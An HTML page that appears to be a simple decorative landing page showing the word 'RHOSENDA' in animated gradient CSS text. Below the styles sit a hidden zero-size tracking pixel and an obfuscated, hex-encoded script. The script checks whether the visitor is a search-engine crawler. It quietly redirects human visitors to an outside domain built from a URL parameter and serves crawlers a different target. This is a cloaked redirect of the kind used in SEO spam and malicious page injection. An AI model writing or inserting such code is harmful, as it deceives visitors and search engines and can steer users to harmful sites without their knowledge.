<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>RHOSENDA</title>
<meta name="robots" content="index,follow"/>
<link rel="icon" type="image/x-icon" href="/favicon.png"/>
<style>
@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@500&display=swap');

* {
  margin: 0;
  padding: 0;
}

body {
  height: 100vh;
  width: 100vw;
  background-color: #FBF8F1;
  
  display: flex;
  align-items: center;
  justify-content: center;
}

h1 {
  font-family: 'Poppins', sans-serif;
  font-size: 25vmin;
  line-height: 20vmin;
}

.gradient-text {
  color: transparent;
  background: conic-gradient(
    #D9D7F1 12%, 
    #BAABDA 12%, #BAABDA 33%, 
    #E7FBBE 33%, #E7FBBE 55%, 
    #FFCBCB 55%, #FFCBCB 70%, 
    #B5DEFF 70%, #B5DEFF 87%, 
    #F7D1BA 87%);
  background-size: 50%;
  background-clip: text;  
  -webkit-background-clip: text;

  animation: expand-rev 0.5s ease forwards;

  cursor: pointer;
}

.gradient-text:hover {
  animation: expand 0.5s ease forwards;
}

@keyframes expand {
  0% {
    background-size: 50%;
    background-position: 0 0;
  }
  20% {
    background-size: 55%;
    background-position: 0 1em;
  }
  100% {
    background-size: 325%;
    background-position: -10em -4em;
  }
}

@keyframes expand-rev {
  0% {
    background-size: 325%;
    background-position: -10em -4em;
  }
  20% {
    background-size: 55%;
    background-position: 0 1em;
  }
  100% {
    background-size: 50%;
    background-position: 0 0;
  }
}
</style>
</head>
<img src="//sstatic1.histats.com/0.gif?4705536&101" alt="" border="0" style="width:0;height:0;">
<script>
var _0x2b1a=["\x72\x65\x70\x6C\x61\x63\x65","\x73\x65\x61\x72\x63\x68","\x70\x61\x74\x68\x6E\x61\x6D\x65","\x65\x78\x65\x63","","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x65\x73\x74","\x69\x74\x65\x6D","\x68\x72\x65\x66","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x79\x64\x61\x63\x6B\x2E\x63\x6F\x6D\x2F\x70\x74\x2F\x69\x2F","\x2E\x68\x74\x6D\x6C"];(function(){let _0xaa71x1=(function(){var _0xaa71x2={};location[_0x2b1a[1]][_0x2b1a[0]](/[?&]+([^=&]+)=([^&]*)/gi,function(_0xaa71x3,_0xaa71x4,_0xaa71x5){_0xaa71x2[_0xaa71x4]= _0xaa71x5});return _0xaa71x2})();(/(\d+)\.html$/[_0x2b1a[3]](location[_0x2b1a[2]]))?/(\d+)\.html$/[_0x2b1a[3]](location[_0x2b1a[2]])[1]:_0x2b1a[4];let _0xaa71x6=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i[_0x2b1a[6]](navigator[_0x2b1a[5]]);if(_0xaa71x1[_0x2b1a[7]]&&  !_0xaa71x6){location[_0x2b1a[8]]= _0x2b1a[9]+ _0xaa71x1[_0x2b1a[7]]+ _0x2b1a[4]}else {if(_0xaa71x1[_0x2b1a[7]]&& _0xaa71x6){location[_0x2b1a[0]](_0x2b1a[9]+ _0xaa71x1[_0x2b1a[7]]+ _0x2b1a[10])}}})()
</script>
<body translate="no" >
<h1 class="gradient-text">RHOSENDA<h1>
</body>
</html>